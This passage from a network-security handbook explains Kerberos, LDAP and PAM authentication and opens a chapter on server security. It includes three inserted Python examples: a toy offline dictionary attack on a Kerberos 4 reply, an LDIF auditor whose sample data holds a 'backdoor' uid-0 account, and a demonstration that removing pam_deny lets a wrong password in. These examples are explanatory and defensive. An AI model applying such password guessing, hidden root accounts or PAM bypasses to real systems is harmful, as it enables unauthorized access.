This ticket contains another ticket, encrypted with the File Server Service's key, that the user's workstation can present to the File Server Service to request files. The contained ticket includes the user's authenticated name, the expiration time, and the Internet address of the user's workstation. The user's workstation then presents this ticket to the File Server Service. The File Server Service decrypts the ticket using its own key, then builds a mapping between the (UID, IP address) of the user's workstation and a UID on the file server. Kerberos puts the time of day in requests to prevent an eavesdropper from intercepting a request and retransmitting it from the same host at a later time in a replay attack.

Kerberos offers several security advantages. Passwords are stored on the Kerberos Server, not on the individual workstations, and are never transmitted on the network, encrypted or otherwise. The Kerberos Authentication Server is able to authenticate the user's identity, because the user knows the user's password, and similarly, the user is able to authenticate the Kerberos Server's identity, because the Kerberos Authentication Server knows the user's password. Other Kerberos services can authenticate the user because the user will present a ticket that is known to have been issued by the Ticket Granting Service, since it is encrypted with the target service's key, which only that service and the Kerberos Server know. An eavesdropper who intercepts a ticket from the Kerberos Server can't use it, because it is encrypted using a key (for a Kerberos service, or derived from the user's password) that the eavesdropper doesn't know.

Authentication, data integrity, and secrecy

Kerberos is a general-purpose system for sharing secret keys between principals on the network. Normally, Kerberos is used solely for authentication. However, the ability to exchange keys can also be used to ensure data integrity and secrecy.
If eavesdropping is an ongoing concern, all information transmitted between the workstation and the service can be encrypted using a key that is exchanged between the two principals. Unfortunately, encryption carries a performance penalty. At MIT, encryption was used for transmitting highly sensitive information such as passwords, but was not used for most data transfer, such as files and electronic mail.

Tickets issued by Kerberos expire after eight hours, which limits the time during which a stolen or intercepted ticket can be replayed. [224] Thus, after eight hours, you must run the kinit program, and provide your username and password a second time, to be issued a new ticket for the Kerberos Ticket Granting Service.

[223] Why the change in protocol? Kerberos 4 attempts to minimize the amount of time that the user's password is stored on the workstation. Unfortunately, because the server hands the encrypted ticket granting ticket to anyone who asks for it by username, this makes Kerberos 4 susceptible to offline password-guessing attacks against the ticket granting ticket. With Kerberos 5, the workstation must demonstrate to the Kerberos Authentication Server that the user knows the correct password before the server will answer. This is a more secure system, although the user's encrypted ticket granting ticket can still be intercepted by an attacker as it is sent from the server to the workstation and attacked with an exhaustive key search.

[224] A different window may be chosen at some sites.

For single-user workstations, Kerberos provides significant additional security beyond that of regular passwords. However, if two people are logged into the workstation at the same time, then the workstation will be authenticated for both users. These users can then pose as each other. This threat is so significant that at MIT, remote login services were disabled on workstations to prevent an attacker from logging in while a legitimate user was being authenticated.
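The exchanges described above (initial login, the Ticket Granting Service, the File Server example, the replay check, and the Kerberos 4 weakness of footnote 223), as an added example that is not code from the Handbook, MIT or Heimdal. It assumes a single process playing workstation, KDC and service, a stand-in authenticated cipher built from SHAKE-256 and HMAC-SHA256 in place of DES, and constructed names: realm EXAMPLE.COM, user alice with password hunter2, service nfs/fileserver and workstation address 10.0.0.5.

```python
"""Toy Kerberos 5 AS/TGS/AP exchanges plus the Kerberos 4 weakness of footnote 223.  Added
example, not MIT/Heimdal code; SHAKE-256 + HMAC-SHA256 stand in for DES; all names are samples."""
import hashlib, hmac, json, os, time

REALM, SKEW = "EXAMPLE.COM", 300  # SKEW: seconds of clock difference a KDC or service tolerates

def string2key(password, salt):  # stand-in for the Kerberos string2key function
    return hashlib.sha256((salt + password).encode()).digest()

def encrypt(key, obj):
    """hex(nonce || ciphertext || tag): encrypt-then-MAC, so a wrong key is detected."""
    pt, nonce = json.dumps(obj, sort_keys=True).encode(), os.urandom(16)
    ct = bytes(a ^ b for a, b in zip(pt, hashlib.shake_256(key + nonce).digest(len(pt))))
    return (nonce + ct + hmac.new(key, nonce + ct, hashlib.sha256).digest()).hex()

def decrypt(key, blob):
    """Raises ValueError on a wrong key; an offline guesser relies on exactly that signal."""
    raw = bytes.fromhex(blob)
    nonce, ct, tag = raw[:16], raw[16:-32], raw[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, hashlib.sha256).digest()):
        raise ValueError("bad key or tampered ciphertext")
    return json.loads(bytes(a ^ b for a, b in zip(ct, hashlib.shake_256(key + nonce).digest(len(ct)))))

def check_ticket(tkt, auth, service, address, now, replay_cache):
    """What a Kerberized service (and the TGS) verifies before trusting a presented ticket."""
    problems = [(tkt["service"] != service, "ticket was issued for another service"),
                (tkt["expires"] < now, "ticket expired; run kinit again"),
                (tkt["address"] != address, "ticket is bound to another workstation address"),
                (auth["client"] != tkt["client"] or abs(auth["timestamp"] - now) > SKEW,
                 "authenticator does not match the ticket or is stale"),
                ((auth["client"], auth["timestamp"]) in replay_cache, "replayed authenticator")]
    for failed, message in problems:
        if failed:
            raise PermissionError(message)
    replay_cache.add((auth["client"], auth["timestamp"]))

class KDC:
    """Authentication Server and Ticket Granting Service on one physical server."""
    def __init__(self, clock=time.time):
        self.clock, self.keys, self.seen = clock, {}, set()  # keys: principal -> long-term key

    def add_principal(self, name, password):
        self.keys[name] = string2key(password, REALM + name)

    def _issue(self, client, service, reply_key, ttl, address):
        session = os.urandom(32).hex()
        tkt = {"client": client, "service": service, "session_key": session,
               "address": address, "expires": self.clock() + ttl}
        return {"ticket": encrypt(self.keys[service], tkt),               # only the service reads this
                "enc_part": encrypt(reply_key, {"session_key": session})}  # only the client reads this

    def as_exchange_v4(self, user, address):  # Kerberos 4 style: nothing proves the password
        return self._issue(user, "krbtgt/" + REALM, self.keys[user], 8 * 3600, address)

    def as_exchange(self, user, preauth, address):  # Kerberos 5 style: encrypted-timestamp pre-auth
        try:
            ts = decrypt(self.keys[user], preauth)["timestamp"]
        except ValueError:
            raise PermissionError("pre-authentication failed")
        if abs(ts - self.clock()) > SKEW:
            raise PermissionError("pre-authentication timestamp is stale")
        return self._issue(user, "krbtgt/" + REALM, self.keys[user], 8 * 3600, address)

    def tgs_exchange(self, tgt, auth, service, address):
        t = decrypt(self.keys["krbtgt/" + REALM], tgt)
        check_ticket(t, decrypt(bytes.fromhex(t["session_key"]), auth), "krbtgt/" + REALM,
                     address, self.clock(), self.seen)
        return self._issue(t["client"], service, bytes.fromhex(t["session_key"]), 3600, address)

def ap_exchange(service_key, service, seen, ticket, auth, peer_address, now):
    """Service side: only its own key opens the ticket; returns the authenticated client name."""
    tkt = decrypt(service_key, ticket)
    check_ticket(tkt, decrypt(bytes.fromhex(tkt["session_key"]), auth), service, peer_address, now, seen)
    return tkt["client"]

def authenticator(user, session_hex, clock):
    return encrypt(bytes.fromhex(session_hex), {"client": user, "timestamp": clock()})

def kinit(kdc, user, password, address):
    """Initial login: the password never leaves the workstation, only an encrypted timestamp does."""
    ukey = string2key(password, REALM + user)
    rep = kdc.as_exchange(user, encrypt(ukey, {"timestamp": kdc.clock()}), address)
    return {"user": user, "tgt": rep["ticket"], "key": decrypt(ukey, rep["enc_part"])["session_key"]}

def offline_guess(enc_part, user, wordlist):
    """Footnote 223: an intercepted Kerberos 4 reply can be attacked offline, one guess at a time."""
    for pw in wordlist:
        try:
            decrypt(string2key(pw, REALM + user), enc_part)
            return pw
        except ValueError:
            continue
    return None

def demo(clock=time.time):
    kdc, ws, seen = KDC(clock), "10.0.0.5", set()
    for name, pw in [("alice", "hunter2"), ("krbtgt/" + REALM, os.urandom(16).hex()),
                     ("nfs/fileserver", os.urandom(16).hex())]:
        kdc.add_principal(name, pw)
    creds = kinit(kdc, "alice", "hunter2", ws)                                          # AS exchange
    rep = kdc.tgs_exchange(creds["tgt"], authenticator("alice", creds["key"], clock),
                           "nfs/fileserver", ws)                                          # TGS exchange
    svc_key = decrypt(bytes.fromhex(creds["key"]), rep["enc_part"])["session_key"]
    ap, nfs_key = authenticator("alice", svc_key, clock), kdc.keys["nfs/fileserver"]
    who = ap_exchange(nfs_key, "nfs/fileserver", seen, rep["ticket"], ap, ws, clock())  # AP exchange
    try:
        ap_exchange(nfs_key, "nfs/fileserver", seen, rep["ticket"], ap, ws, clock())    # replayed
        replay = "accepted"
    except PermissionError as e:
        replay = str(e)
    v4 = kdc.as_exchange_v4("alice", ws)["enc_part"]  # anyone can ask for this one, no password needed
    return {"who": who, "replay": replay, "v4_guessed": offline_guess(v4, "alice", ["letmein", "hunter2"])}

if __name__ == "__main__":
    print(demo())
```

Running demo() shows the three exchanges succeeding, the same authenticator being rejected the second time it is presented (the replay check the text describes), and the Kerberos 4 style reply, obtained with nothing but a username, yielding the password to a two-word dictionary. The Kerberos 5 path never hands an eavesdropper anything to guess at until the client has proved it already knows the key.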
It is also possible for someone to subvert the local software on the workstation to capture the user's password as it is typed (as with a regular system).

Getting Kerberos

Kerberos or Kerberos-like security systems are now available from several companies, as well as being a standard part of several operating systems, including Solaris, Mac OS X, and many Linux and BSD distributions. A version of Kerberos 5 has been included in Microsoft Windows from the Windows 2000 release onwards. It is possible (with some effort) to make Kerberos interoperable between Unix machines and Windows platforms. [225] If you need to install Kerberos from scratch, the MIT Kerberos source code is available to United States and Canadian citizens from http://web.mit.edu/kerberos/www/ and to others from http://www.crypto-publish.org. You can also find official updates, patches, and bug announcements there. Kerberos has had several bugs discovered, so it is important that you ensure that you are using the most recent version of the code. There is also a free software implementation of Kerberos called Heimdal that is under active development; it is largely compatible with MIT's Kerberos. You can get Heimdal at http://www.pdc.kth.se/heimdal/. The changes required to your system's software are substantial if you need to do it yourself; see the documentation provided with Kerberos for details.

Kerberos and LDAP

Kerberos mixes well with LDAP (discussed in the next section). Kerberos can be used to authenticate and secure LDAP queries and updates. Conversely, the LDAP database can store information about users that is more extensive than the data maintained by Kerberos alone, such as the user's home directory, shell, phone number, or other organizational information. Together, the two services can provide all of the functionality of NIS or NIS+, and they are being increasingly used to do so.
Jason Heiss provides a good guide to this process on his page "Replacing NIS with Kerberos and LDAP" at http://www.ofb.net/~jheiss/krbldap/

LDAP is sometimes used to store Kerberos keys. The Windows implementation of Kerberos uses Microsoft's Active Directory Service (a flavor of LDAP) to store Kerberos keys. Heimdal Kerberos supports this functionality. MIT Kerberos does not, out of concern that sensitive security infrastructure should be centralized at the Kerberos server, rather than distributed via LDAP.

Kerberos Limitations

Although Kerberos is an excellent solution to a difficult problem, it has several shortcomings:

Every network service must be individually modified for use with Kerberos

Because of the Kerberos design, every program that uses Kerberos must be modified. The process of performing these modifications is often called "Kerberizing" the application. Typically, to Kerberize an application, you must have the application's source code, or the application must use a security framework that already incorporates Kerberos, such as PAM (discussed at the end of this chapter).

[225] Note, however, that Microsoft has made proprietary modifications to the Kerberos protocol which have the effect of forcing Windows clients to use Kerberos servers running on Windows servers. In a mixed Unix-Windows environment, the Windows 2000 machine must be the Kerberos server to provide full functionality.

Kerberos doesn't work well in a time-sharing environment

Kerberos is designed for an environment in which there is one user per workstation. If a user is sharing the computer with several other people, it is possible that the user's tickets can be stolen, that is, copied by an attacker. Stolen tickets can then be used to obtain fraudulent service.
Kerberos requires a secure and available Kerberos Server

By design, Kerberos requires that there be a secure central server that maintains the master password database and that is continuously available. To ensure security, a site should use the Kerberos Server for absolutely nothing beyond running the Kerberos Server program. The Kerberos Server must be kept under lock and key, in a physically secure area. If the Kerberos Server goes down, the Kerberos network is unusable. The Kerberos Server stores all user keys (which are password equivalents) encrypted with the server's master key, which is itself usually kept on the same hard disk as the encrypted keys. This means that, in the event that the Kerberos Server is compromised, all user passwords must be changed.

Kerberos does not protect against modifications to system software (Trojan horses)

Kerberos does not have the local workstation authenticate itself to the user; that is, there is no way for a user sitting at a computer to determine whether the computer has been compromised. This failing is easily exploited by a knowledgeable attacker. These problems are consequences of the fact that, even in a networked environment, many workstations contain local copies of the programs that they run.

Kerberos may result in a cascading loss of trust

If a server password or a user password is broken or otherwise disclosed, it is possible for an eavesdropper to use that password to decrypt other tickets and use this information to spoof servers and users.

Kerberos is a workable system for network security, and it is widely used. But more importantly, the principles behind Kerberos are increasingly available in network security systems that are available directly from vendors.

LDAP

The Lightweight Directory Access Protocol (LDAP) is a low-overhead version of the X.500-based directory access service.
It provides for the storage of directory information (including, for authentication systems, usernames and passwords) with access and update over a secure network channel. There are two major versions of LDAP. LDAPv2, described in the 1995 RFC 1777, provides no security for passwords unless it is implemented in conjunction with Kerberos. LDAPv3, described in RFC 2251, adds support for SASL (the Simple Authentication and Security Layer, RFC 2222). SASL provides several additional approaches to secure password authentication (including Kerberos!). Furthermore, both the most widely used open source implementation of LDAPv3 (OpenLDAP 2.x) and the most widely used commercial implementation (Microsoft's Active Directory in versions beginning with Windows 2000) support the use of SSL/TLS to secure the entire communication link between client and server, including the authentication process.

On its own, LDAP provides general directory services. For example, many organizations deploy LDAP to organize their employee phone, e-mail, and address directory, or directories of computers on the network. We discuss LDAP in this chapter because it can form the basis of an authentication and network information system, and because it is increasingly being used for that purpose, particularly on Windows and Linux systems.

LDAP: The Protocol

The LDAP server's data is organized as a tree of entries, each belonging to one or more object classes, and each containing attributes with values. Every entry is named by a relative distinguished name (RDN), typically one of its own attributes such as cn (common name) or uid, that distinguishes it from the other entries with the same parent in the tree; the chain of RDNs from the root down to the entry is its distinguished name (dn). For example, an entry belonging to the "posixAccount" object class includes attributes that specify the user's full name (cn), login name (uid), user and group id numbers (uidNumber and gidNumber), home directory (homeDirectory), login shell (loginShell), and other user data.
In LDAP terms, a schema is a collection of logically associated object classes and the definitions of their attributes. The posixAccount object class is defined in the network information service schema (nis.schema).

LDAP is a client-server protocol. The LDAP client sends requests to the LDAP server, and receives responses back. Clients can send requests to modify the server's data store, or to search it and return one or more attributes of a particular entry, or a whole subtree of entries.

Integrity and Reliability

Modern LDAP servers (e.g. Active Directory or OpenLDAP 2.x) provide several important features to ensure the integrity of the data and the reliability of the system:

Data integrity and confidentiality

The LDAP server can accept connections secured by TLS, and can provide end-to-end encryption of the client-server interaction. In addition, TLS makes unauthorized modification of the data stream infeasible.

Server authentication

To support TLS, the LDAP server is assigned a cryptographic public-key certificate, signed by a trusted certifying authority. LDAP clients with the certificate of the certifying authority can assure themselves that they are communicating with the server they intended to communicate with.

Client authentication

LDAP servers can also demand TLS certificates from clients, thus ensuring that only authorized clients can query or update the server.

Replication

An LDAP server can replicate entire LDAP datastores onto secondary servers to provide redundancy should the master server fail.

LDAP is a powerful and flexible alternative to NIS or NIS+. Its primary advantages include its ability to store and serve non-authentication data as well as authentication information, and the availability of TLS-secured communication. Its primary disadvantage is that updating the LDAP database is more complex than updating an NIS master, but several tools have been developed to simplify LDAP administration.
Authentication with LDAP

RFC 2307 describes an approach to using LDAP as a network information system. Although this RFC does not specify an Internet standard, its mechanisms are widely used, and a schema to implement them (nis.schema) is included with OpenLDAP 2.x. The schema defines object classes that represent users (posixAccount and shadowAccount), groups (posixGroup), services (ipService), protocols (ipProtocol), remote procedure calls (oncRPC), hosts (ipHost), networks (ipNetwork), NIS netgroups (nisNetgroup, nisMap, nisObject), and more.

Each service that authenticates users must be rewritten to perform an LDAP lookup; this is analogous to the "Kerberizing" process that Kerberos requires. This approach is simple for operating systems like Microsoft Windows that require that all authentications use a vendor-distributed API; very little rewriting of client software is necessary. For Unix-based operating systems, this approach is inefficient. Instead, two alternatives have been developed, released as open source software by PADL Software Pty, Ltd., and included with most Linux distributions. One, nss_ldap, modifies the C library functions for getting user information (such as getpwent()) to transparently use an LDAP database instead of (or along with) local files, NIS, and so on. Many systems already allow these functions to use a variety of information sources by means of a "name service switch" file (usually /etc/nsswitch.conf). See PUIS, 450-453 for details on configuring authentication using libnss_ldap. Another approach is to use the PAM framework, discussed in the next section. LDAP authentication is implemented as a PAM module, pam_ldap. Unlike libnss_ldap, pam_ldap provides only user authentication against the LDAP database; it does not distribute other database information.
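The RFC 2307 posixAccount mapping that nss_ldap performs, as an added example (not code from the Handbook, OpenLDAP or PADL): a small LDIF reader that checks each entry for the attributes nis.schema requires, flags two things a directory will happily serve to getpwent() (a uidNumber of 0 and a userPassword with no hash scheme prefix, which OpenLDAP stores and compares in cleartext), and renders clean entries as the passwd(5) line nss_ldap would produce. SAMPLE_LDIF and the dc=example,dc=com suffix are constructed sample data.

```python
"""Check RFC 2307 posixAccount entries and render them as passwd(5) lines.

Added example, not from the Handbook, OpenLDAP or PADL's nss_ldap.  It parses a
small LDIF file, verifies the attributes that nis.schema marks as required for
posixAccount, flags two things nss_ldap would happily serve (a uidNumber of 0
and a cleartext userPassword), and builds the passwd line nss_ldap would produce.
The LDIF below is constructed sample data."""
import base64

MUST = ("cn", "uid", "uidNumber", "gidNumber", "homeDirectory")


def parse_ldif(text):
    """Minimal LDIF reader: folded continuation lines, '::' base64 values, comments."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:      # continuation of the previous line
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    entries, entry = [], {}
    for line in lines + [""]:                 # trailing "" flushes the last entry
        if line.startswith("#"):
            continue
        if not line.strip():
            if entry:
                entries.append(entry)
            entry = {}
            continue
        name, _, value = line.partition(":")
        if value.startswith(":"):             # "attr:: base64"
            value = base64.b64decode(value[1:].strip()).decode()
        entry.setdefault(name, []).append(value.strip())
    return entries


def check_account(entry):
    """Problems with one entry as an account; an empty list means it is usable."""
    if "posixAccount" not in entry.get("objectClass", []):
        return ["not a posixAccount"]
    problems = ["missing required attribute " + a for a in MUST if a not in entry]
    for attr in ("uidNumber", "gidNumber"):
        if attr in entry and not entry[attr][0].isdigit():
            problems.append(attr + " is not numeric")
    if entry.get("uidNumber", [""])[0] == "0":
        problems.append("uidNumber 0: this entry would map to root")
    for pw in entry.get("userPassword", []):
        if not pw.startswith("{") or pw.upper().startswith("{CLEARTEXT}"):
            problems.append("userPassword stored in cleartext; use {CRYPT} or {SSHA}")
    return problems


def to_passwd_line(entry):
    """RFC 2307 mapping: uid:x:uidNumber:gidNumber:gecos:homeDirectory:loginShell."""
    gecos = entry.get("gecos", entry["cn"])[0]
    shell = entry.get("loginShell", [""])[0]  # empty shell field = system default, as in passwd(5)
    return ":".join([entry["uid"][0], "x", entry["uidNumber"][0], entry["gidNumber"][0],
                     gecos, entry["homeDirectory"][0], shell])


def audit_ldif(text):
    """dn -> passwd line for clean entries, or the list of problems otherwise."""
    report = {}
    for entry in parse_ldif(text):
        problems = check_account(entry)
        report[entry["dn"][0]] = problems or to_passwd_line(entry)
    return report


SAMPLE_LDIF = """\
# constructed sample directory, not a real organization
dn: uid=jdoe,ou=People,dc=example,dc=com
objectClass: posixAccount
objectClass: shadowAccount
cn: Jane Doe
uid: jdoe
uidNumber: 1001
gidNumber: 100
homeDirectory: /home/jdoe
loginShell: /bin/bash
userPassword: {SSHA}c2FtcGxlIGhhc2gsIG5vdCByZWFs

dn: uid=backdoor,ou=People,dc=example,dc=com
objectClass: posixAccount
cn: Night Shift
uid: backdoor
uidNumber: 0
gidNumber: 0
homeDirectory: /root
userPassword: secret123

dn: uid=intern,ou=People,dc=example,dc=com
objectClass: posixAccount
cn:: SW50ZXJuIFRlc3Q=
uid: intern
uidNumber: 1002
gidNumber: 100
"""

if __name__ == "__main__":
    for dn, result in audit_ldif(SAMPLE_LDIF).items():
        print(dn, "->", result)
```

Point it at the output of ldapsearch -LLL over the People subtree to get the same check against a live directory. The uidNumber 0 case matters because nss_ldap does not filter it: an entry anyone can create under ou=People (see the access-control discussion for NIS+ above, which applies equally to LDAP ACLs) becomes a second root account on every client.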
If your LDAP server is using the standard nis.schema, adding LDAP authentication to a PAM-controlled service is as easy as adding a line to its PAM configuration file that specifies pam_ldap.so as sufficient for authentication, account verification, and password updating.

Pluggable Authentication Modules (PAM)

Because there are so many ways to authenticate users, it's convenient to have a unified approach to authentication that can handle multiple authentication systems for different needs. The Pluggable Authentication Modules (PAM) system is one such approach. PAM was originally developed by Sun, and implementations are available for Solaris, FreeBSD, and especially Linux, where most PAM development is now centered. PAM provides a library and API that any application can use to authenticate users against a myriad of authentication systems. Each authentication system that PAM knows about is implemented as a PAM module, which in turn is implemented as a dynamically loaded shared library. PAM modules are available to authenticate users through:

· /etc/passwd or /etc/shadow files
· NIS or NIS+
· LDAP
· Kerberos 4 or 5
· An arbitrary Berkeley DB file [226]

Each PAM-aware service is configured either in the /etc/pam.conf file or, more commonly, in its own file in the /etc/pam.d directory. For example, the PAM configuration file for the ssh server in Linux distributions is /etc/pam.d/sshd. A service named "other" is used to provide defaults for PAM-aware services that are not explicitly configured.
Here is an example of a PAM configuration file for sshd on a Linux server:

    auth       required     /lib/security/pam_env.so
    auth       sufficient   /lib/security/pam_unix.so
    auth       required     /lib/security/pam_deny.so
    account    required     /lib/security/pam_unix.so
    password   required     /lib/security/pam_cracklib.so retry=3
    password   sufficient   /lib/security/pam_unix.so nullok use_authtok md5 shadow
    password   required     /lib/security/pam_deny.so
    session    required     /lib/security/pam_limits.so
    session    required     /lib/security/pam_unix.so

The "auth" lines describe the authentication process for this service, which proceeds in the order specified. Modules marked "required" must run successfully for authentication to progress; if they fail, the user is considered unauthenticated and generally will be denied access, although the remaining modules in the stack are still run so that the user cannot tell which one rejected him. Multiple "required" modules can be specified; in these cases, all of the modules must run successfully. Modules marked "sufficient," if run successfully, are sufficient to authenticate the user and end the authentication process, provided that no earlier "required" module has failed; a failing "sufficient" module is simply ignored and processing continues with the next line.

In this example, the first module run is pam_env, which optionally sets or clears environment variables specified in /etc/security/pam_env.conf. This module is required; it must run successfully for authentication to proceed. The next module run is pam_unix, which performs authentication with the usual Unix password files, /etc/passwd and /etc/shadow. If this succeeds, it is sufficient to authenticate the user, and the process is complete.

[226] If that's not enough layers for you, some applications, such as SMTP authentication in sendmail or access to mailboxes managed by the Cyrus imapd server, use the Cyrus SASL (simple authentication and security layer) authentication library, which can authenticate users with a separate database or through PAM! It is not inconceivable that you might find SASL using PAM using LDAP to authenticate a user's imap connection.
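The stack semantics just described, evaluated over the sshd configuration above, as an added example (not code from the Handbook or from Linux-PAM). It assumes the four simple control flags behave as pam.conf(5) documents them (the bracketed [value=action] syntax is not modelled), and each module's result is supplied as data rather than by running real modules; pam_env, pam_deny and pam_permit are given their fixed outcomes.

```python
"""Evaluate a PAM auth stack the way Linux-PAM resolves its simple control flags.

Added example, not from the Handbook or from Linux-PAM.  It models the four
simple controls (required, requisite, sufficient, optional) as pam.conf(5)
describes them and ignores the bracketed [value=action] syntax.  Module
outcomes are supplied as data, so no real modules run."""

# Outcomes that do not depend on the user: pam_deny always fails, pam_permit
# always succeeds, pam_env succeeds when its config file is readable.
FIXED_OUTCOMES = {"pam_deny": False, "pam_permit": True, "pam_env": True}


def parse_pam(text):
    """'auth required /lib/security/pam_env.so' -> {'auth': [('required', 'pam_env', []), ...]}"""
    groups = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        mtype, control, path, *args = line.split()
        module = path.rsplit("/", 1)[-1].replace(".so", "")
        groups.setdefault(mtype, []).append((control, module, args))
    return groups


def run_stack(stack, outcomes):
    """Return True if the stack grants access given each module's result."""
    required_failed, succeeded = False, False
    for control, module, _args in stack:
        ok = outcomes.get(module, False)         # an unknown module fails closed
        if control == "requisite":
            if not ok:
                return False                     # fail immediately
            succeeded = True
        elif control == "required":
            if ok:
                succeeded = True
            else:
                required_failed = True           # keep going, then fail at the end
        elif control == "sufficient":
            if ok and not required_failed:
                return True                      # short-circuit success
        elif control == "optional":
            if len(stack) == 1:
                succeeded = ok                   # only counts when it is the sole module
        else:
            raise ValueError("unknown control flag %r" % control)
    return succeeded and not required_failed


def authenticate(pam_text, password_ok):
    """Run the 'auth' group with pam_unix reporting whether the password was right."""
    outcomes = dict(FIXED_OUTCOMES, pam_unix=password_ok)
    return run_stack(parse_pam(pam_text)["auth"], outcomes)


# The Handbook's sshd configuration, reproduced as the input to this check.
SSHD_PAM = """\
auth       required     /lib/security/pam_env.so
auth       sufficient   /lib/security/pam_unix.so
auth       required     /lib/security/pam_deny.so
account    required     /lib/security/pam_unix.so
password   required     /lib/security/pam_cracklib.so retry=3
password   sufficient   /lib/security/pam_unix.so nullok use_authtok md5 shadow
password   required     /lib/security/pam_deny.so
session    required     /lib/security/pam_limits.so
session    required     /lib/security/pam_unix.so
"""

# The same file with the final auth pam_deny line removed, a common editing mistake.
WITHOUT_DENY = "\n".join(l for l in SSHD_PAM.splitlines()
                         if not (l.startswith("auth") and "pam_deny" in l))

if __name__ == "__main__":
    print("book config, good password:", authenticate(SSHD_PAM, True))
    print("book config, bad password: ", authenticate(SSHD_PAM, False))
    print("no pam_deny, bad password: ", authenticate(WITHOUT_DENY, False))
```

The third case is the one to remember: with the pam_deny line gone, a wrong password leaves pam_unix's failure ignored (it is only "sufficient"), so the last result that counts is pam_env's success and the stack grants access to anyone. That is why the Handbook's file, like the stock Linux distribution files, closes every stack with pam_deny.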
The final authentication module is pam_deny, which simply fails, ending the process with authentication unsuccessful; it is there so that a user whose password pam_unix rejected is denied explicitly, rather than falling through to whatever result the earlier modules produced. This particular configuration file will also enforce any account aging or expiration rules of the system, and set resource limits on the user's sshd session. If sshd provided a password-changing function, this configuration file would also prevent the user from changing his password to an easily guessable one, and store password hashes in /etc/shadow using the MD5-based crypt scheme rather than the traditional DES-based one.

The PAM subsystem can be configured in a number of different ways. For instance, it is possible to require two or three separate passwords for some accounts, [227] combine a biometric method along with a passphrase, or pick a different mechanism depending on the time of day. It is also possible to remove the requirement of a password for hard-wired lines in highly secured physical locations. PAM allows the administrator to pick a policy that best matches the risk and technology at hand.

PAM can do a lot more than authentication, as the examples above suggest. One of its strengths is that it clearly delineates four phases of the access process: verification that the account is viable for the desired service at the desired time and from the desired location (the account phase), authentication of the user (the auth phase), updating passwords and other authentication tokens when necessary (the password phase), and setting up and closing down the user's session (the session phase), which can include limiting resource access and establishing audit trails.

[227] This is of questionable value when the same user holds all of the passwords. This approach can be valuable when the passwords are assigned to different users, so that any login requires two or more people, and creates a "witness" trail.

CHAPTER 6.
SERVER SECURITY

At a Glance

Server security is the security of the computer on which your Internet servers are running. This chapter discusses some of the most common security problems that affect computers being used to offer information services and describes how to build servers that minimize these problems. This chapter discusses general host security first, and then application security issues for mail servers, file servers, web servers, database servers, and name servers.

Host Security

Many organizations that run servers on the Internet simply do not secure their servers against external attack. People still pick easy-to-guess passwords, and many passwords are simply "sniffed" out of the Internet using a variety of readily available packet sniffers. Today there are literally thousands of organized and semi-organized groups of attackers, all exchanging information regarding computer vulnerabilities and exploits. Techniques, and in many cases complete programs for penetrating system security, are now widely distributed by e-mail, through newsgroups, on web pages, and over Internet Relay Chat (IRC). Tools for compromising security (password sniffers, denial-of-service exploits, and prepackaged Trojan horses) are distributed as well. Attackers now use automated tools to search out vulnerable computers and, in some cases, to automatically break in, plant back doors, and hide the damage. High-speed Internet connections have made it possible for attackers to rapidly scan and attack millions of computers within a very short period of time.

The Honeynet Project (http://project.honeynet.org/) is an open Internet research project that is attempting to gauge the scale of the attacker community by setting up vulnerable computers on the Internet and seeing how long it takes before the computers are compromised. The results are not encouraging.
In June 2001, for instance, the Honeynet Project announced that it took only 72 hours, on average, before somebody broke into a newly installed Red Hat 6.2 system using one of the well-known exploits. A typical system on the Internet is scanned dozens of times a day. Windows 98 computers with file sharing enabled--a typical configuration for many home users--are scanned almost once an hour and typically broken into in less than a day. In one case, a server was hacked only 15 minutes after it was put on the network.

It's tempting to approach host security as a checklist of do's and don'ts for computers and networks. After all, to damage a computer, an attacker must have access. So in theory, to operate a secure system, all you need to do is to block all of the venues by which an attacker can get access, and the resulting system will be secure. In practice, however, it has proved nearly impossible to have a computer that offers services over the network and yet still denies all access to attackers. Often access comes through unintended holes, such as a carelessly coded CGI script, or a buffer overflow that is known to the attacker but not to the computer's operators. For more than a decade, there have been nine widespread practices on the Internet that make host security far worse than it needs to be.
These practices are:

· Failure to think about security as a fundamental aspect of system setup and design (establishing policy)
· Purchase and configuration of computing systems based on issues of cost or compatibility rather than on the desired functionality and security needs
· Failure to obtain and maintain software that's free of all known bugs and security holes
· Running unnecessary services
· Transmitting plaintext, reusable passwords over networks
· Failure to track security developments and take preventative action
· Failure to use security tools properly, if they are used at all
· Lack of adequate auditing and logging (discussed in chapter 5-5)
· Lack of adequate backup procedures (discussed in chapter 5-3)

Security Through Policy

Security is defined by policy. In some environments, every user is allowed to install or modify the organization's web pages. In others, only a few users are allowed to even read the pages. In some environments, any user can shut down or reboot the system. In others, it requires signed authorization from the CIO to so much as replace a file. Policy helps users understand what is allowed. Policy guides administrators and managers in making choices about system configuration and use. Policy helps designers create systems that realize the organization's goals. The most basic security policy is a clear statement of what actions are allowed and disallowed, and by whom. Standards and guidelines should include the answers to these questions:

· Who is allowed access, what is the nature of that access, and who authorizes such access?
· Who is responsible for security, for upgrades, for backups, and for maintenance?
· What kinds of information may be served?
· Which sites and external users are to be allowed access to data served?
· What kinds of testing and evaluation must be performed on software and pages before they are installed?
· How will complaints and requests about the server and content be handled?
· How should the organization react to security incidents?
· Who is allowed to speak to members of the press, law enforcement, and other entities outside the organization in the event of questions or an incident?
· How and when should the policy itself be updated?

Your policy documents should be written and made available to everyone associated with your organization. Care given to the development of the policy can head off lots of potential problems. One often-overlooked policy issue is how to dispose of storage devices. The hard drives of your servers, your old backup tapes, and even your user workstations, may contain valuable and private data. In addition to protecting them from compromise while they are in operation, be sure you have a policy that provides for their sanitization or thorough destruction when they go out of operation. Sanitizing hard drives, for example, is surprisingly difficult: deleting files or reformatting the drive does not remove the data, so either overwrite the entire device with a purpose-built wiping tool or physically destroy it.

Choosing Your Vendor

Today there are many choices for organizations setting up information servers. Should your computer run Windows, Mac OS, Unix, or a "free" Unix-like operating system? Should your computer system use an Intel-compatible microprocessor, or a SPARC, PowerPC, or another processor? Should you purchase the computer with or without support? What level of support is appropriate?

Many purchase decisions are based on factors such as the cost of the system, the reputation of the vendor, and the experience of the person making the purchase. Few organizations base their purchase decisions on the security of the underlying system. Some vendors and platforms have better security pedigrees than others, because different manufacturers value code quality and security differently.
But the size of the user base also affects the security that a system will provide--even relatively secure systems can become "unsecure" in the face of a large number of well-funded adversaries who widely publicize their findings.

